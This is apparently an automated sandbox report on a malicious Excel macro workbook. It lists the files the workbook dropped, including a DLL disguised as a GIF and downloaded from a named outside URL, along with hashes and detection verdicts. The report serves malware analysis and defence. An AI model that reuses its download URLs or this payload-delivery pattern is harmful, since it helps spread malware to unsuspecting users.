                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-04-07T05:47:01">.. Build: 16.0.13925.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\20BE64B1.png
                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                        File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):557
                                                                                                                                                                                        Entropy (8bit):7.343009301479381
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                                                                                                                        MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                                                                                                                        SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                                                                                                                                        SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                                                                                                                        SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                        Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5B12A2FE.png
                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                        File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):848
                                                                                                                                                                                        Entropy (8bit):7.595467031611744
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                                                                                                                        MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                                                                                                                        SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                                                                                                                        SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                                                                                                                        SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                        Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5F1FFB70.png
                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                        File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):8301
                                                                                                                                                                                        Entropy (8bit):7.970711494690041
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                                                                                                                                                                                        MD5:D8574C9CC4123EF67C8B600850BE52EE
                                                                                                                                                                                        SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                                                                                                                                                                                        SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                                                                                                                                                                                        SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                        Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F7B17AE7.png
                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                        File Type:PNG image data, 240 x 52, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):7197
                                                                                                                                                                                        Entropy (8bit):7.964447218948388
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:DTUaFds32VHjg5vCBadV58kJ+hX5Y+BXj:D4csOjg5qBadV5n0HY+Vj
                                                                                                                                                                                        MD5:D4E702617A12082888A2FD8BB0A2A8AC
                                                                                                                                                                                        SHA1:7F3A85C42B1B6814E3F32AD579BE8DF4CFF825B3
                                                                                                                                                                                        SHA-256:94102F2D952184B98AF8F0459D6B98AE55CD9D1F445F0EA15A4163A6ED3E3579
                                                                                                                                                                                        SHA-512:DE6C3865F994D8A4332CD7F1CE8398FBE37F17E7B7EB650E271D60A832AC1B3FA98C96EDDB6CE6E353876FE7976C4C8FC64E6D724ADB22971F8D3E2290B35942
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Preview: .PNG........IHDR.......4......,.0....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^..|.......IH!..@...D.S.....I.......H.....>....]....(W.H..{.....-..}S....9..f.l .3:.|.;.3g...;..&...a....F...F.........4.\or7..3N..{..yt....A.....h..#g,$.....|&.....Ka....YPh.O.\::..............,...[y;~....t.....N0j.:::U.].ut.0....Tat........S...XG.!...I........3...M........=...8..W.".F.....k.....K...........S...I&..rsM".G....t.CJ.P.db..Hy.7..u....J?K3.?C..j.meRH..wh\.]T..Qm[.8..,.=z.\\.~.F.L..].u....j[.}{.........n}A~....K...m)b.O.h......N~...W/z...:U......_@.nn...C...g..........A.d....X#..u.c'..e.e.k7m....>...`.5...8P.<;w..i{.....w..h....*....-....h{.....MK...<<=....^X.{.....I..l+.........7.......I!5j.}.)5%U....0f...o..`..p..,b..M...D....=<$.......:.v6n.H).....8=-........4`..j.).]\.wk...(>..........n,<.q.t...m...j......h`G.]..t|X...........Id..V.'~.X222.M.v..S....o.~4...P..}..XbX.....;....-Y...1...]...7.c...k[*..w..;le=*$.=z>..
                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\suspendedpage[1].htm
                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):7624
                                                                                                                                                                                        Entropy (8bit):5.642596381720329
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJf0:QJvVGaRF8I80
                                                                                                                                                                                        MD5:190F2D4BCDE1E366EAAB903C29C7A699
                                                                                                                                                                                        SHA1:346D44A0619C97AA226EF52F146F9A133F4DCAAF
                                                                                                                                                                                        SHA-256:20C2D643754869BA5763DDC6289A0FADBBF2DE81236F1F80B7FA3588B14F6EBB
                                                                                                                                                                                        SHA-512:AB3C39F0B6A07F798E9546FA882BE0D850F88337DFBFBF7A797A67B43CC1EA8718C842619E4FE169FD3A6FE270C39866F6B4DBB0187612B2840A6474D0E26BB6
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        IE Cache URL:https://ponchokhana.com/cgi-sys/suspendedpage.cgi
                                                                                                                                                                                        Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.
                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\0504[1].gif
                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                        Size (bytes):136850
                                                                                                                                                                                        Entropy (8bit):5.532976262969374
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W
                                                                                                                                                                                        MD5:27B3D546DFB32D0EB72850D6F592F37E
                                                                                                                                                                                        SHA1:6948CE189746087F7B611B7364049E679D6F8AA8
                                                                                                                                                                                        SHA-256:CFFBAC0E507996E936B34B2FE8D0620810C30552AEAF2A808FE356E0C9BF1F04
                                                                                                                                                                                        SHA-512:C35B5461F3D417A78CB90299DEC4CE4F90C4094C5761E403054FED2D4B7193C784D5CDC40B51F20D171EAA2225119FFED9EC55FD0AF0BD233EA93AF459EFA8E1
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                        IE Cache URL:https://thefamouscurrybazaar.co.uk/ds/0504.ocx
                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._W...6e..6e..6e.)v..6e...w..6e.Rich.6e.................PE..L.....f`...........!................ko..................................................................................d............................................................................................................................code.............................. ..`.data...d...........................@..@.data...............................@....rdata... .......".......................data...............................@...................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\70810000
                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):87970
                                                                                                                                                                                        Entropy (8bit):7.883997627529112
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:mAOS/YubKteg7acz0YqAyfzZDSU7RbA8oxd7caCQQVnJos:mAOq/ny0YgVDHbA8oxOkyJ1
                                                                                                                                                                                        MD5:329BDE1FC7C13A5F825D5F3E05DF9A9C
                                                                                                                                                                                        SHA1:E5B92CA241679FD0A659AA0C2536103D8BDDA68C
                                                                                                                                                                                        SHA-256:B752257F0AEF7834376475250E19581FED00033024BFF622118D874E7E3C5549
                                                                                                                                                                                        SHA-512:8894ED032637C41CC53F3FF98256815CC8CE516C263A280C3F9C02E891C04F7DA914223913F923B8FF91C5FF10A4491C3015DEAA0A24CDB71852BA19A5D58852
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview: .UMO.0......|E....Z5.....`..kO.....@..w....*MK..|...qf..+k.W.....E5a.8.vM.~=..Y.I8%.wP.5 ...}.>..`A..k..~p...+.....,|.".klx.r)........%p.L...?a!^L*nW..Q2..7..2U.D.FK.H(.u..I...-Ay.b....A(l..5U......D.!.[9.k>pj.5.......&.......lu.s2......}...0j....^Xr.....q9.~Y...fZ,a%.T.c..2.['..hOh..p.S....].A..!.]..I.<.............?(_..<.....z..a...'..w........im.O|.6.c...............x..x.p..=....F...Nl.......c..i^D8\.{...e .I..l.........C.f...n.M..o.......PK..........!....M....~.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        C:\Users\user\Desktop\~$FED8GODpaD.xlsb
                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):165
                                                                                                                                                                                        Entropy (8bit):1.6081032063576088
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                                                        MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                                                        SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                                                        SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                                                        SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                        C:\Users\user\fikftkm.thj1
                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):136850
                                                                                                                                                                                        Entropy (8bit):5.532976262969374
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:tm15JsYYm3GCVS7ZicTJzRVd620ZmB9RMli0msUdqZEACW4jySTLW:eLsacThRVd6pmBPM07vYZEA4/W
                                                                                                                                                                                        MD5:27B3D546DFB32D0EB72850D6F592F37E
                                                                                                                                                                                        SHA1:6948CE189746087F7B611B7364049E679D6F8AA8
                                                                                                                                                                                        SHA-256:CFFBAC0E507996E936B34B2FE8D0620810C30552AEAF2A808FE356E0C9BF1F04
                                                                                                                                                                                        SHA-512:C35B5461F3D417A78CB90299DEC4CE4F90C4094C5761E403054FED2D4B7193C784D5CDC40B51F20D171EAA2225119FFED9EC55FD0AF0BD233EA93AF459EFA8E1
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._W...6e..6e..6e.)v..6e...w..6e.Rich.6e.................PE..L.....f`...........!................ko..................................................................................d............................................................................................................................code.............................. ..`.data...d...........................@..@.data...............................@....rdata... .......".......................data...............................@...................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                        C:\Users\user\fikftkm.thj3
                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):7624
                                                                                                                                                                                        Entropy (8bit):5.642596381720329
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJf0:QJvVGaRF8I80
                                                                                                                                                                                        MD5:190F2D4BCDE1E366EAAB903C29C7A699
                                                                                                                                                                                        SHA1:346D44A0619C97AA226EF52F146F9A133F4DCAAF
                                                                                                                                                                                        SHA-256:20C2D643754869BA5763DDC6289A0FADBBF2DE81236F1F80B7FA3588B14F6EBB
                                                                                                                                                                                        SHA-512:AB3C39F0B6A07F798E9546FA882BE0D850F88337DFBFBF7A797A67B43CC1EA8718C842619E4FE169FD3A6FE270C39866F6B4DBB0187612B2840A6474D0E26BB6
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview: <!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.

                                                                                                                                                                                        Static File Info

                                                                                                                                                                                        General

                                                                                                                                                                                        File type:Microsoft Excel 2007+
                                                                                                                                                                                        Entropy (8bit):7.867622294442132
                                                                                                                                                                                        TrID:
                                                                                                                                                                                        • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                                                        • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                                                        • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                                                        File name:FED8GODpaD.xlsb
                                                                                                                                                                                        File size:74635
                                                                                                                                                                                        MD5:889194eb6a3904f14ab7ffd672c97ad5
                                                                                                                                                                                        SHA1:983b743e8d66666d2262fe6f6d21c9950ea64bdc
                                                                                                                                                                                        SHA256:a80382d030b0c292a73e83cdcbd0f4e30f43f43bd7d2e3250dcf83e1d2d51503
                                                                                                                                                                                        SHA512:508e2d23ff9f02ad15aa5f6e0c551b5d8234a558823d376d824820d2be5a090ad9aeca2b2ffd4552be7b2c555de19581cdbd0bf639998d9807b62507cc8341d5
                                                                                                                                                                                        SSDEEP:1536:ZUwcQTnrmMFOxW9cnGV67h5KSqhbPeB5FSJUfrcz0YW2fR3e:QQTnCMFOxW9cGV67h5KSqVPeBHRjy0YY
                                                                                                                                                                                        File Content Preview:PK..........!...YQ$...;.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                                                        File Icon

                                                                                                                                                                                        Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                                                        Static OLE Info

                                                                                                                                                                                        General

                                                                                                                                                                                        Document Type:OpenXML
                                                                                                                                                                                        Number of OLE Files:1

                                                                                                                                                                                        OLE File "FED8GODpaD.xlsb"

                                                                                                                                                                                        Indicators

                                                                                                                                                                                        Has Summary Info:
                                                                                                                                                                                        Application Name:
                                                                                                                                                                                        Encrypted Document:
                                                                                                                                                                                        Contains Word Document Stream:
                                                                                                                                                                                        Contains Workbook/Book Stream:
                                                                                                                                                                                        Contains PowerPoint Document Stream:
                                                                                                                                                                                        Contains Visio Document Stream:
                                                                                                                                                                                        Contains ObjectPool Stream:
                                                                                                                                                                                        Flash Objects Count:
                                                                                                                                                                                        Contains VBA Macros:

                                                                                                                                                                                        Macro 4.0 Code

                                                                                                                                                                                        ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,